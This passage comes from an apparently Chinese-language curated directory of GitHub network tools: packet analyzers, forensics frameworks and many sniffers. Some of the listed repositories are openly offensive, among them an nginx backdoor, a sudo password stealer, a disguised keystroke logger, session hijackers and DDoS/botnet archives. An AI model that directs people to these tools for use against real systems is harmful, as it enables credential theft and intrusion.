[**67**ๆ˜Ÿ][3y] [JS] [pythonran/pcap_tools](https://github.com/pythonran/pcap_tools) ็ฝ‘็ปœๆต้‡ๅฏ้…็ฝฎๅ—…ๆŽข๏ผŒๆต้‡ๅŒ…่งฃๆž๏ผŒๆผๆดž่ง„ๅˆ™ๆ‰ซๆ๏ผŒ็”ŸๆˆๆŠฅๅ‘Š - [**65**ๆ˜Ÿ][1y] [Py] [ch3k1/squidmagic](https://github.com/ch3k1/squidmagic) analyze a web-based network traffic ### <a id="8dd8c4c8d11c149aa803a221480687d2"></a>ๅ่ฎฎๅˆ†ๆž - [**1454**ๆ˜Ÿ][4d] [Go] [skydive-project/skydive](https://github.com/skydive-project/skydive) An open source real-time network topology and protocols analyzer - [**472**ๆ˜Ÿ][2m] [Py] [netzob/netzob](https://github.com/netzob/netzob) ้€šไฟกๅ่ฎฎ้€†ๅ‘ใ€ๅปบๆจกๅ’Œๆจก็ณŠๆต‹่ฏ• ### <a id="9dfefb87c4dc3288b2eddf6780e8ffb9"></a>็ฝ‘็ปœ่ฏŠๆ–ญ - [**2536**ๆ˜Ÿ][2y] [Py] [google/nogotofail](https://github.com/google/nogotofail) ๅธฎๅŠฉๅผ€ๅ‘ไบบๅ‘˜ๅ’Œๅฎ‰ๅ…จ็ ”็ฉถไบบๅ‘˜ๅœจ่ฎพๅค‡ๅ’Œๅบ”็”จ็จ‹ๅบไธŠๅ‘็ŽฐๅนถไฟฎๅคๅผฑTLS / SSL่ฟžๆŽฅ้—ฎ้ข˜๏ผŒๅฎšไฝๆ•ๆ„Ÿ็š„ๆ˜Žๆ–‡ๆต้‡ใ€‚็ตๆดปใ€ๅฏๆ‰ฉๅฑ•ใ€ๅŠŸ่ƒฝๅผบๅคง - [**2249**ๆ˜Ÿ][2y] [Go] [mehrdadrad/mylg](https://github.com/mehrdadrad/mylg) ็ฝ‘็ปœ่ฏŠๆ–ญๅทฅๅ…ท - [**1302**ๆ˜Ÿ][17d] [C] [traviscross/mtr](https://github.com/traviscross/mtr) ็ป“ๅˆโ€œ tracerouteโ€ๅ’Œโ€œ pingโ€็š„ๅŠŸ่ƒฝ๏ผŒ็”จไบŽ็ฝ‘็ปœ่ฏŠๆ–ญ ### <a id="b3811e8d4be5755957b0ec0e336715a2"></a>ๅ–่ฏ - [**5208**ๆ˜Ÿ][7m] [Py] [usarmyresearchlab/dshell](https://github.com/usarmyresearchlab/dshell) ๅฏๆ‰ฉๅฑ•็š„็ฝ‘็ปœๅ–่ฏๅˆ†ๆžๆก†ๆžถใ€‚ๆ”ฏๆŒๅฟซ้€Ÿๅผ€ๅ‘ๆ’ไปถ๏ผŒไปฅๆ”ฏๆŒๅ‰–ๆž็ฝ‘็ปœๆ•ฐๆฎๅŒ…ๆ•่Žทใ€‚ - [**791**ๆ˜Ÿ][4m] [Py] [srinivas11789/pcapxray](https://github.com/srinivas11789/pcapxray) ็ฝ‘็ปœๅ–่ฏๅทฅๅ…ท๏ผš็ฆป็บฟๅฐ†ๆ•่Žทๆ•ฐๆฎๅŒ…ๅฏ่ง†ๅŒ–ไธบ็ฝ‘็ปœๅ›พ๏ผŒๅŒ…ๆ‹ฌ่ฎพๅค‡ๆ ‡่ฏ†๏ผŒ็ชๅ‡บๆ˜พ็คบ้‡่ฆ็š„้€šไฟกๅ’Œๆ–‡ไปถๆๅ– - [**31**ๆ˜Ÿ][5y] [Py] [madpowah/forensicpcap](https://github.com/madpowah/forensicpcap) pcapๅ–่ฏ - [**11**ๆ˜Ÿ][3y] [Py] [nipunjaswal/wireless-forensics-framework](https://github.com/nipunjaswal/wireless-forensics-framework) Wireless Forensics Framework In Python ### <a id="07701b342951b5d7bfa839db7752f9dd"></a>Xxๅˆ†ๆž - [**527**ๆ˜Ÿ][1m] [Py] [hatboy/pcap-analyzer](https://github.com/hatboy/pcap-analyzer) Python็ผ–ๅ†™็š„ๅฏ่ง†ๅŒ–็š„็ฆป็บฟๆ•ฐๆฎๅŒ…ๅˆ†ๆžๅ™จ - [**381**ๆ˜Ÿ][5y] [JS] [le4f/pcap-analyzer](https://github.com/le4f/pcap-analyzer) ๅœจ็บฟ่ฝป้‡Pcapๆต้‡ๆ–‡ไปถๅˆ†ๆžๅทฅๅ…ท - [**211**ๆ˜Ÿ][1y] [Py] [mateuszk87/pcapviz](https://github.com/mateuszk87/pcapviz) ๅฏ่ง†ๅŒ–็ฝ‘็ปœๆ‹“ๆ‰‘๏ผŒๅŸบไบŽpcapๆ–‡ไปถๆ”ถ้›†ๅ›พๅฝข็ปŸ่ฎกไฟกๆฏ - [**122**ๆ˜Ÿ][5y] [JS] [thepacketgeek/cloud-pcap](https://github.com/thepacketgeek/cloud-pcap) Web PCAPๅญ˜ๅ‚จๅ’Œๅˆ†ๆž ### <a id="32739127f0c38d61b14448c66a797098"></a>ๅ—…ๆŽข&&Sniff - [**3510**ๆ˜Ÿ][8m] [Go] [fanpei91/torsniff](https://github.com/fanpei91/torsniff) ไปŽBitTorrent็ฝ‘็ปœๅ—…ๆŽข็งๅญ - [**3510**ๆ˜Ÿ][8m] [Go] [fanpei91/torsniff](https://github.com/fanpei91/torsniff) ไปŽBitTorrent็ฝ‘็ปœๅ—…ๆŽข็งๅญ - [**1756**ๆ˜Ÿ][8d] [PHP] [wordpress/wordpress-coding-standards](https://github.com/wordpress/wordpress-coding-standards) PHP_CodeSniffer rules (sniffs) to enforce WordPress coding conventions - [**1536**ๆ˜Ÿ][5d] [C++] [nmap/npcap](https://github.com/nmap/npcap) Nmap้กน็›ฎ็š„้’ˆๅฏนWindows็ณป็ปŸ็š„ๆ•ฐๆฎๅŒ…ๅ—…ๆŽขๅบ“๏ผŒๅŸบไบŽWinPcap/Libpcap๏ผŒ็”จNDIS6ๅ’ŒLWFๅšไบ†ๅ‡็บง - [**1338**ๆ˜Ÿ][3m] [C++] [mfontanini/libtins](https://github.com/mfontanini/libtins) High-level, multiplatform C++ network packet sniffing and crafting library. - [**1333**ๆ˜Ÿ][1y] [C] [gamelinux/passivedns](https://github.com/gamelinux/passivedns) A network sniffer that logs all DNS server replies for use in a passive DNS setup - [**1232**ๆ˜Ÿ][4d] [Py] [danmcinerney/net-creds](https://github.com/danmcinerney/net-creds) Sniffs sensitive data from interface or pcap - [**1064**ๆ˜Ÿ][7m] [PS] [nytrorst/netripper](https://github.com/nytrorst/netripper) ๅŽๆธ—้€ๅทฅๅ…ท,้’ˆๅฏนWindows, ไฝฟ็”จAPI Hookingๆ‹ฆๆˆช็ฝ‘็ปœๆต้‡ๅ’ŒๅŠ ๅฏ†็›ธๅ…ณๅ‡ฝๆ•ฐ, ๅฏๆ•่Žทๆ˜Žๆ–‡ๅ’ŒๅŠ ๅฏ†ๅ‰ๅŽ็š„ๅ†…ๅฎน - [**994**ๆ˜Ÿ][1y] [Py] [tylous/sniffair](https://github.com/tylous/sniffair) ๆ— ็บฟๆธ—้€ๆก†ๆžถ. ่งฃๆž่ขซๅŠจๆ”ถ้›†็š„ๆ— ็บฟๆ•ฐๆฎ, ๆ‰ง่กŒๅคๆ‚็š„ๆ— ็บฟๆ”ปๅ‡ป - [**928**ๆ˜Ÿ][3y] [Eagle] [samyk/keysweeper](https://github.com/samyk/keysweeper) KeySweeper is a stealthy Arduino-based device, camouflaged as a functioning USB wall charger, that wirelessly and passively sniffs, decrypts, logs and reports back (over GSM) all keystrokes from any Microsoft wireless keyboard in the vicinity. - [**922**ๆ˜Ÿ][2y] [JS] [diracdeltas/sniffly](https://github.com/diracdeltas/sniffly) Sniffing browser history using HSTS - [**884**ๆ˜Ÿ][7m] [Go] [40t/go-sniffer](https://github.com/40t/go-sniffer) - [**796**ๆ˜Ÿ][8m] [Py] [phaethon/kamene](https://github.com/phaethon/kamene) Network packet and pcap file crafting/sniffing/manipulation/visualization security tool. Originally forked from scapy in 2015 and providing python3 compatibility since then. - ้‡ๅคๅŒบๆฎต: [ๅทฅๅ…ท->Scapy](#01f99d208e245eb44f15f720043b50d4) | - [**788**ๆ˜Ÿ][3m] [C] [netsniff-ng/netsniff-ng](https://github.com/netsniff-ng/netsniff-ng) A Swiss army knife for your daily Linux network plumbing. - [**716**ๆ˜Ÿ][2y] [Py] [madeye/sssniff](https://github.com/madeye/sssniff) sssniff๏ผšShadowSocksๆต้‡ๅ—…ๆŽข - [**642**ๆ˜Ÿ][1y] [Go] [ga0/netgraph](https://github.com/ga0/netgraph) A cross platform http sniffer with a web UI - [**639**ๆ˜Ÿ][2y] [C] [qihoo360/mysql-sniffer](https://github.com/qihoo360/mysql-sniffer) mysql-sniffer is a network traffic analyzer tool for mysql, it is developed by Qihoo DBA and infrastructure team - [**635**ๆ˜Ÿ][2y] [Py] [mschwager/dhcpwn](https://github.com/mschwager/dhcpwn) testing DHCP IP exhaustion attacks๏ผŒ sniff local DHCP traffic - [**626**ๆ˜Ÿ][3m] [Go] [eldadru/ksniff](https://github.com/eldadru/ksniff) Kubectl plugin to ease sniffing on kubernetes pods using tcpdump and wireshark - [**565**ๆ˜Ÿ][11d] [PHP] [object-calisthenics/phpcs-calisthenics-rules](https://github.com/object-calisthenics/phpcs-calisthenics-rules) Object Calisthenics rules for PHP_CodeSniffer - [**478**ๆ˜Ÿ][7d] [pixelcyber/thor](https://github.com/pixelcyber/thor) HTTP Sniffer/Capture on iOS for Network Debug & Inspect. - [**459**ๆ˜Ÿ][5m] [C] [jarun/keysniffer](https://github.com/jarun/keysniffer) - [**432**ๆ˜Ÿ][3m] [Ruby] [aderyabin/sniffer](https://github.com/aderyabin/sniffer) Log and Analyze Outgoing HTTP Requests - [**427**ๆ˜Ÿ][6d] [Rust] [kpcyrd/sniffglue](https://github.com/kpcyrd/sniffglue) Secure multithreaded packet sniffer - [**401**ๆ˜Ÿ][5m] [PHP] [floedesigntechnologies/phpcs-security-audit](https://github.com/floedesigntechnologies/phpcs-security-audit) phpcs-security-audit is a set of PHP_CodeSniffer rules that finds vulnerabilities and weaknesses related to security in PHP code - [**316**ๆ˜Ÿ][5y] [C] [seastorm/puttyrider](https://github.com/seastorm/puttyrider) Hijack Putty sessions in order to sniff conversation and inject Linux commands. - [**293**ๆ˜Ÿ][5m] [C] [pulkin/esp8266-injection-example](https://github.com/pulkin/esp8266-injection-example) Example project to demonstrate packet injection / sniffer capabilities of ESP8266 IC. - [**291**ๆ˜Ÿ][10m] [C] [jiaoxianjun/btle](https://github.com/jiaoxianjun/btle) Bluetooth Low Energy (BLE) packet sniffer and generator for both standard and non standard (raw bit). - [**264**ๆ˜Ÿ][2m] [Py] [xdavidhu/probesniffer](https://github.com/xdavidhu/probesniffer) - [**260**ๆ˜Ÿ][8m] [Py] [needmorecowbell/sniff-paste](https://github.com/needmorecowbell/sniff-paste) Pastebin OSINT Harvester - [**250**ๆ˜Ÿ][1m] [C] [nccgroup/sniffle](https://github.com/nccgroup/sniffle) A sniffer for Bluetooth 5 and 4.x LE - [**236**ๆ˜Ÿ][2y] [C++] [pellegre/libcrafter](https://github.com/pellegre/libcrafter) C++ ็ผ–ๅ†™็š„็ฝ‘็ปœๆ•ฐๆฎๅŒ…ๅ—…ๆŽขๅ’Œ่งฃ็ ๅบ“ - [**229**ๆ˜Ÿ][3y] [C] [omriiluz/nrf24-btle-decoder](https://github.com/omriiluz/nrf24-btle-decoder) Sniff and decode NRF24L01+ and Bluetooth Low Energy using RTL-SDR - [**198**ๆ˜Ÿ][3y] [Py] [isofew/sssniff](https://github.com/isofew/sssniff) ShadowSocks(SS) traffic sniffer - [**191**ๆ˜Ÿ][3m] [Py] [alainiamburg/sniffrom](https://github.com/alainiamburg/sniffrom) A tool for passive data capture and reconnaissance of serial flash chips. It is used in conjunction with a Saleae logic analyzer to reconstruct flash memory contents and extract contextual information about device operations. - [**179**ๆ˜Ÿ][1y] [Shell] [brannondorsey/sniff-probes](https://github.com/brannondorsey/sniff-probes) Plug-and-play bash script for sniffing 802.11 probes requests - [**179**ๆ˜Ÿ][6y] [Py] [syworks/wireless-ids](https://github.com/syworks/wireless-ids) Ability to detect suspicious activity such as (WEP/WPA/WPS) attack by sniffing the air for wireless packets. - [**174**ๆ˜Ÿ][17d] [HTML] [openvizsla/ov_ftdi](https://github.com/openvizsla/ov_ftdi) FT2232H-based USB sniffer - [**165**ๆ˜Ÿ][5y] [Perl] [xme/hoover](https://github.com/xme/hoover) Wireless Probe Requests Sniffer - [**152**ๆ˜Ÿ][18d] [Py] [shirosaidev/sharesniffer](https://github.com/shirosaidev/sharesniffer) ่ฟœ็จ‹ๆ–‡ไปถ็ณป็ปŸ่‡ชๅŠจๅ—…ๆŽขใ€ๆŒ‚่ฝฝๅ’Œ็ˆฌๅ– - [**151**ๆ˜Ÿ][1y] [C] [caesar0301/http-sniffer](https://github.com/caesar0301/http-sniffer) A multi-threading tool to sniff TCP flow statistics and embedded HTTP headers from PCAP file. Each TCP flow carrying HTTP is exported to text file in json format. - [**150**ๆ˜Ÿ][2y] [Py] [vduddu/malware](https://github.com/vduddu/malware) Rootkits | Backdoors | Sniffers | Virus | Ransomware | Steganography | Cryptography | Shellcodes | Webshells | Keylogger | Botnets | Worms | Other Network Tools - [**137**ๆ˜Ÿ][7y] [C] [t57root/pwnginx](https://github.com/t57root/pwnginx) Pwn nginx - a nginx backdoor provides shell access, socks5 tunneling, http password sniffing. - [**135**ๆ˜Ÿ][2y] [ObjC] [objective-see/sniffmk](https://github.com/objective-see/sniffmk) sniff mouse and keyboard events - [**120**ๆ˜Ÿ][6m] [Rust] [kanishkarj/snoopy](https://github.com/kanishkarj/snoopy) A highly configurable multi-threaded packet sniffer and parser build in rust-lang. - [**116**ๆ˜Ÿ][1y] [C] [nospaceships/raw-socket-sniffer](https://github.com/nospaceships/raw-socket-sniffer) Packet capture on Windows without a kernel driver - [**104**ๆ˜Ÿ][1m] [JS] [wilddeer/sniffer](https://github.com/wilddeer/sniffer) browser/engine/os/device detection tool - [**101**ๆ˜Ÿ][1y] [Py] [macr0phag3/sniffer](https://github.com/macr0phag3/sniffer) A Sniffer for Open-WLAN - [**101**ๆ˜Ÿ][2m] [C] [onotelli/justniffer](https://github.com/onotelli/justniffer) Justniffer Just A Network TCP Packet Sniffer .Justniffer is a network protocol analyzer that captures network traffic and produces logs in a customized way, can emulate Apache web server log files, track response times and extract all "intercepted" files from the HTTP traffic - [**99**ๆ˜Ÿ][8y] [Java] [gadgetfactory/openbench-logic-sniffer](https://github.com/gadgetfactory/openbench-logic-sniffer) OLS is a $50 32 channel Logic Analyzer - [**99**ๆ˜Ÿ][9y] [C] [tecknicaltom/dsniff](https://github.com/tecknicaltom/dsniff) dsniff is a collection of tools for network auditing and penetration testing. - [**98**ๆ˜Ÿ][8m] [Swift] [kofktu/sniffer](https://github.com/kofktu/sniffer) Networking activity logger for Swift - [**95**ๆ˜Ÿ][2y] [HTML] [frizb/sourcecodesniffer](https://github.com/frizb/sourcecodesniffer) The Source Code Sniffer is a poor manโ€™s static code analysis tool (SCA) that leverages regular expressions. Designed to highlight high risk functions (Injection, LFI/RFI, file uploads etc) across multiple languages (ASP, Java, CSharp, PHP, Perl, Python, JavaScript, HTML etc) in a highly configurable manner. - [**90**ๆ˜Ÿ][26d] [Ruby] [shopify/browser_sniffer](https://github.com/shopify/browser_sniffer) Properly detect what browser you are dealing with - [**87**ๆ˜Ÿ][t] [Py] [r00ts3c/ddos-rootsec](https://github.com/r00ts3c/ddos-rootsec) DDOS Archive by RootSec (Scanners, BotNets (Mirai and QBot Premium & Normal and more), Exploits, Methods, Sniffers) - [**80**ๆ˜Ÿ][13d] [PHP] [automattic/vip-coding-standards](https://github.com/automattic/vip-coding-standards) PHP_CodeSniffer ruleset to enforce WordPress.com VIP and VIP Go coding standards - [**79**ๆ˜Ÿ][1y] [C] [adafruit/adafruit_blesniffer_python](https://github.com/adafruit/adafruit_blesniffer_python) Python API for Adafruit's Bluefruit LE Sniffer - [**79**ๆ˜Ÿ][3y] [bastilleresearch/keysniffer](https://github.com/bastilleresearch/keysniffer) KeySniffer device discovery tools and public advisories - [**78**ๆ˜Ÿ][4y] [C] [kala13x/scap](https://github.com/kala13x/scap) Network Sniffer (Scan and Capture Incoming Packets) - [**76**ๆ˜Ÿ][5y] [C++] [yveaux/nrf24_sniffer](https://github.com/yveaux/nrf24_sniffer) Sniffer for Nordic NRF24L01+ modules with MySensors support - [**74**ๆ˜Ÿ][10m] [Verilog] [denandz/lpc_sniffer_tpm](https://github.com/denandz/lpc_sniffer_tpm) A low pin count sniffer for ICEStick - targeting TPM chips - [**72**ๆ˜Ÿ][2y] [C++] [vecna/sniffjoke](https://github.com/vecna/sniffjoke) a client-only layer of protection from the wiretap/sniff/IDS analysis - [**66**ๆ˜Ÿ][5y] [Py] [adamlaurie/hdmi-sniff](https://github.com/AdamLaurie/hdmi-sniff) sniff HDMI DDC (I2C) traffic - [**66**ๆ˜Ÿ][8m] [Py] [nordicsemiconductor/nrf-sniffer-for-802.15.4](https://github.com/NordicSemiconductor/nRF-Sniffer-for-802.15.4) nRF-based 802.15.4 sniffer (firmware and software) - [**64**ๆ˜Ÿ][4y] [Py] [halit/isip](https://github.com/halit/isip) Interactive sip toolkit for packet manipulations, sniffing, man in the middle attacks, fuzzing, simulating of dos attacks. - [**64**ๆ˜Ÿ][7y] [C++] [hurley25/sniffer](https://github.com/hurley25/sniffer) ไธ€ไธช่ทจๅนณๅฐ็š„็ฝ‘็ปœๆ•ฐๆฎๅ—…ๆŽข&ๆŠ“ๅŒ…็จ‹ๅบ๏ผŒๅŸบไบŽQt 4.x ไปฅๅŠ libpcap ๅบ“๏ผˆLinuxไธ‹๏ผ‰ๅ’Œ Winpcapๅบ“๏ผˆWindows ไธ‹๏ผ‰ใ€‚ - [**64**ๆ˜Ÿ][3y] [Py] [scipag/btle-sniffer](https://github.com/scipag/btle-sniffer) Passively scan for Bluetooth Low Energy devices and attempt to fingerprint them - [**60**ๆ˜Ÿ][6y] [Py] [offensivepython/sniffy](https://github.com/offensivepython/sniffy) A Simple network sniffer implemented on Python 3 - [**59**ๆ˜Ÿ][2m] [PHP] [sirbrillig/phpcs-variable-analysis](https://github.com/sirbrillig/phpcs-variable-analysis) Find undefined and unused variables with the PHP Codesniffer static analysis tool. - [**57**ๆ˜Ÿ][4y] [Go] [zond/qisniff](https://github.com/zond/qisniff) - [**56**ๆ˜Ÿ][4y] [Py] [geovation/wifispy](https://github.com/geovation/wifispy) Sniff Wifi traffic, log device addresses. - [**52**ๆ˜Ÿ][10m] [Java] [ruedigergad/clj-net-pcap](https://github.com/ruedigergad/clj-net-pcap) A wrapper/facade/whatever to enable/ease the use of jNetPcap (a libpcap based packet sniffing lib) in Clojure - [**51**ๆ˜Ÿ][14d] [Java] [p1sec/sigfw](https://github.com/p1sec/sigfw) Open Source Signaling Firewall for SS7, Diameter filtering, antispoof and antisniff - [**51**ๆ˜Ÿ][5m] [HTML] [whatwg/mimesniff](https://github.com/whatwg/mimesniff) MIME Sniffing Standard - [**51**ๆ˜Ÿ][1y] [Py] [zhovner/airport-sniffer](https://github.com/zhovner/airport-sniffer) Very simple Wi-Fi sniffer and dumps parser for built-in macbook AirPort Extreme card. Only native MacOS tools used. - [**50**ๆ˜Ÿ][1y] [Go] [zredshift/mimemagic](https://github.com/zredshift/mimemagic) Powerful and versatile MIME sniffing package using pre-compiled glob patterns, magic number signatures, XML document namespaces, and tree magic for mounted volumes, generated from the XDG shared-mime-info database. - [**49**ๆ˜Ÿ][7y] [C++] [1184893257/simplesniffer](https://github.com/1184893257/simplesniffer) ๅŸบไบŽ WinPcap ็š„็ฝ‘็ปœๆŠ“ๅŒ…่ฝฏไปถ๏ผŒไฝฟ็”จ MFC ๅš็•Œ้ข - [**49**ๆ˜Ÿ][22d] [JS] [whichbrowser/parser-javascript](https://github.com/whichbrowser/parser-javascript) Browser sniffing gone too far โ€” A useragent parser library for JavaScript - [**48**ๆ˜Ÿ][2y] [C++] [anubisss/szimatszatyor](https://github.com/anubisss/szimatszatyor) World of Warcraft (WoW): SzimatSzatyor is an injector sniffer written in C++ - [**48**ๆ˜Ÿ][5m] [C] [chentingz/snifferui](https://github.com/chentingz/snifferui) ๅŸบไบŽMFCๅ’ŒWinPcapๅบ“ๅผ€ๅ‘็š„็ฝ‘็ปœๆŠ“ๅŒ…ๅ’Œๅ่ฎฎๅˆ†ๆž่ฝฏไปถ - [**48**ๆ˜Ÿ][3y] [C] [rodrigoalvesvieira/soundkeylogger](https://github.com/rodrigoalvesvieira/soundkeylogger) An experimental project to demonstrate how a user keyboard input may be sniffed through the pattern analysis of the sounds emitted by the keystrokes. - [**47**ๆ˜Ÿ][2y] [Shell] [nyxgeek/dumpsniffer](https://github.com/nyxgeek/dumpsniffer) tools for analyzing strings from password lists - [**45**ๆ˜Ÿ][9m] [C++] [ncatlin/exilesniffer](https://github.com/ncatlin/exilesniffer) A protocol decryption and dissection tool for the game 'Path of Exile' - [**44**ๆ˜Ÿ][1y] [C] [petabi/sniffles](https://github.com/petabi/sniffles) Packet Capture Generator for IDS and Regular Expression Evaluation - [**44**ๆ˜Ÿ][6y] [IDL] [riverloopsec/apimote](https://github.com/riverloopsec/apimote) ApiMote IEEE 802.15.4/ZigBee Sniffing Hardware - [**42**ๆ˜Ÿ][4y] [Py] [xme/tweetsniff](https://github.com/xme/tweetsniff) Grab a Twitter user timeline for further processing (storing to Elasticsearch, highligthing, etc) - [**41**ๆ˜Ÿ][3y] [Py] [tengzhangchao/websniff](https://github.com/tengzhangchao/websniff) ๅฑ€ๅŸŸ็ฝ‘httpๆต้‡ๅ—…ๆŽข๏ผŒๅนถ่Žทๅ–็™ป้™†็š„่ดฆๅทๅฏ†็  - [**41**ๆ˜Ÿ][25d] [PHP] [xchwarze/cain](https://github.com/xchwarze/cain) Password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncoverโ€ฆ - [**40**ๆ˜Ÿ][1y] [Shell] [adityashrm21/raspberrypi-packet-sniffer](https://github.com/adityashrm21/raspberrypi-packet-sniffer) An HTTP and HTTPS sniffing tool created using a Raspberry Pi - [**40**ๆ˜Ÿ][5y] [Py] [flankerhqd/wifimonster](https://github.com/flankerhqd/wifimonster) Wifi sniffing and hijacking tool - [**38**ๆ˜Ÿ][1y] [Py] [activecm/passer](https://github.com/activecm/passer) Passive service locator, a python sniffer that identifies servers, clients, names and much more - [**38**ๆ˜Ÿ][7y] [Py] [mainframed/mfsniffer](https://github.com/mainframed/mfsniffer) Mainframe TN3270 unencrypted TSO session user ID and password sniffer - [**34**ๆ˜Ÿ][2y] [C++] [chiehmin/sheepwall](https://github.com/chiehmin/sheepwall) Sniff plaintext account/password/cookie on router - [**34**ๆ˜Ÿ][7y] [JS] [nv/setinterval-sniffer](https://github.com/nv/setinterval-sniffer) Keep tabs on your uncleared intervals. Hunt down lags and memory leaks. - [**34**ๆ˜Ÿ][1y] [Py] [oros42/dns_sniffer](https://github.com/oros42/dns_sniffer) A python DNS sniffer - [**31**ๆ˜Ÿ][2y] [PHP] [bmitch/codor](https://github.com/bmitch/codor) Custom PHPCS sniffs to find Code Smells - [**31**ๆ˜Ÿ][2y] [Go] [paultag/sniff](https://github.com/paultag/sniff) Dispatch TLS Connections based on SNI - [**31**ๆ˜Ÿ][2y] [Go] [pyinx/zk-sniffer](https://github.com/pyinx/zk-sniffer) sniffer and parse zookeeper packet - [**30**ๆ˜Ÿ][24d] [PHP] [php-fig-rectified/psr2r-sniffer](https://github.com/php-fig-rectified/psr2r-sniffer) A PSR-2-R code sniffer and code-style auto-correction-tool - including many useful additions - [**29**ๆ˜Ÿ][6y] [Py] [catalyst256/sniffmypackets](https://github.com/catalyst256/sniffmypackets) Canari local transforms pcap file analysis - [**25**ๆ˜Ÿ][6y] [cbrunsch/wmbus-sniffer-muc](https://github.com/cbrunsch/wmbus-sniffer-muc) Source code of the demonstration programs showed in the Black Hat '13 presentation "Energy fraud and orchestrated blackouts: Issues with wireless metering protocols (WM-BUS)" by Cyrill Brunschwiler - [**24**ๆ˜Ÿ][3m] [Py] [jplesperance/redis-sniffer](https://github.com/jplesperance/redis-sniffer) A Redis event sniffer and logging utility. - [**23**ๆ˜Ÿ][7m] [Py] [antisomnus/sniffer](https://github.com/antisomnus/sniffer) Simple sniffer using scapy and PyQt5 on Windows 10 - ้‡ๅคๅŒบๆฎต: [ๅทฅๅ…ท->Scapy](#01f99d208e245eb44f15f720043b50d4) | - [**22**ๆ˜Ÿ][2y] [C] [jerome-ps/jn516xsniffer](https://github.com/jerome-ps/jn516xsniffer) Transform a Xiaomi Zigbee gadget into a Zigbee sniffer. - [**22**ๆ˜Ÿ][9y] [C] [zapotek/cdpsnarf](https://github.com/zapotek/cdpsnarf) CDPSnarf is a network sniffer exclusively written to extract information from CDP (Cisco Discovery Protocol) packets. - [**21**ๆ˜Ÿ][1y] [PHP] [codeclimate/codeclimate-phpcodesniffer](https://github.com/codeclimate/codeclimate-phpcodesniffer) Code Climate Engine for PHP Code Sniffer - [**20**ๆ˜Ÿ][3y] [C] [a232319779/phantom-3-standard](https://github.com/a232319779/phantom-3-standard) Used hackrf one to sniffer nrf24l0 and so on wireless packet.Application in PHANTOM 3 STANDARD RC signal sniffer. - [**19**ๆ˜Ÿ][2y] [Verilog] [lynxis/lpc_sniffer](https://github.com/lynxis/lpc_sniffer) a low pin count sniffer for icestick - [**19**ๆ˜Ÿ][2y] [C++] [namreeb/hacksniff](https://github.com/namreeb/hacksniff) A tool to monitor how a target process modifies other processes - [**19**ๆ˜Ÿ][3y] [ObjC] [ura14h/blesniffer](https://github.com/ura14h/blesniffer) A Bluetooth LE sniffer for CC2540 USB dongle and Mac. - [**19**ๆ˜Ÿ][7y] [C++] [6e726d/native-wifi-api-beacon-sniffer](https://github.com/6e726d/native-wifi-api-beacon-sniffer) Tool that dumps beacon frames to a pcap file. Works on Windows Vista or Later with any Wireless Card. - [**18**ๆ˜Ÿ][6y] [Java] [taufderl/whatsapp-sniffer-android-poc](https://github.com/taufderl/whatsapp-sniffer-android-poc) proof of concept app to show how to upload and decrypt WhatsApp backup database - [**18**ๆ˜Ÿ][7y] [Py] [eldraco/darm](https://github.com/eldraco/darm) darm - intelligent network sniffer for the masses darm is an attempt to create a very easy to use app that will sniff and report information about the activities happening on a live network. The main goal is to educate the public so that it becomes aware of the security of their communications. darm is being developed by leandrinux as a project โ€ฆ - [**18**ๆ˜Ÿ][5y] [C++] [halfdanj/ofxsniffer](https://github.com/halfdanj/ofxsniffer) Network packet sniffing and crafting wrapper based on the libtins library. - [**17**ๆ˜Ÿ][3y] [JS] [bugscanteam/bugrequest](https://github.com/bugscanteam/bugrequest) Sniffer vulnerabilities in http request (chrome extension) - [**15**ๆ˜Ÿ][6y] [Py] [mbains/linux-802.15.4-sniffer](https://github.com/mbains/linux-802.15.4-sniffer) Linux Based 802.15.4/Zigbee Sniffer - [**15**ๆ˜Ÿ][2y] [C] [ps2/rtlmm](https://github.com/ps2/rtlmm) Software to sniff minimed RF packets using a RTLSDR dongle - [**14**ๆ˜Ÿ][2y] [C] [julioreynaga/sniffer](https://github.com/julioreynaga/sniffer) Packet Trace Parser for TCP, SMTP Emails, and HTTP Cookies - [**13**ๆ˜Ÿ][2y] [Py] [lyyyuna/dht_sniffer](https://github.com/lyyyuna/dht_sniffer) DHT ๅ…ฌ็ฝ‘ๅ—…ๆŽขๅ™จ - [**13**ๆ˜Ÿ][3y] [Py] [vshymanskyy/blesniffer_python](https://github.com/vshymanskyy/blesniffer_python) Software for nRF BLE Sniffer - [**12**ๆ˜Ÿ][4y] [PS] [harmj0y/netripper](https://github.com/harmj0y/netripper) NetRipper - Smart traffic sniffing for penetration testers - [**12**ๆ˜Ÿ][2y] [C] [majbthrd/cansniffer](https://github.com/majbthrd/cansniffer) CANbus sniffer using STM32F042 microcontroller - [**12**ๆ˜Ÿ][5y] [Py] [sneakersinc/sniffmypacketsv2](https://github.com/sneakersinc/sniffmypacketsv2) Next major release of sniffMyPackets - Now with added packet loving - [**12**ๆ˜Ÿ][3y] [C++] [coac/foybot](https://github.com/coac/foybot) MMO Packet sniffer experiment - [**11**ๆ˜Ÿ][3y] [C] [mjdubell/sudo_sniff](https://github.com/mjdubell/sudo_sniff) Steal user's password when running sudo for post-exploitation purposes - [**10**ๆ˜Ÿ][2m] [Py] [gisdev01/security-ssid-abi](https://github.com/gisdev01/security-ssid-abi) Sniff wifi probes from nearby devices (passive monitoring only) and logs to an InfluxDB time-series database - [**10**ๆ˜Ÿ][1m] [PHP] [hostnet/css-sniffer](https://github.com/hostnet/css-sniffer) Static code analyses for CSS and LESS. - [**10**ๆ˜Ÿ][4y] [C] [wifimon/wifimon](https://github.com/wifimon/wifimon) Wi-fi 802.11 Beacon Frame sniffer - [**9**ๆ˜Ÿ][1y] [Py] [haopeiwen/sniffer](https://github.com/haopeiwen/sniffer) IS301 Computer Communication and Network Project - [**8**ๆ˜Ÿ][1y] [Perl] [0xcesium/hackrf-gnu-radio](https://github.com/0xcesium/hackrf-gnu-radio) HackRF modules to sniff GSM 900MHz bands. - [**8**ๆ˜Ÿ][6m] [Py] [amlight/ofp_sniffer](https://github.com/amlight/ofp_sniffer) An OpenFlow sniffer to help network troubleshooting in production networks. - [**8**ๆ˜Ÿ][2y] [C++] [mgostih/snifferih](https://github.com/mgostih/snifferih) DLL Hooking Packet Sniffer - [**8**ๆ˜Ÿ][7m] [JS] [piecioshka/xhr-sniffer](https://github.com/piecioshka/xhr-sniffer) - [**8**ๆ˜Ÿ][9m] [Py] 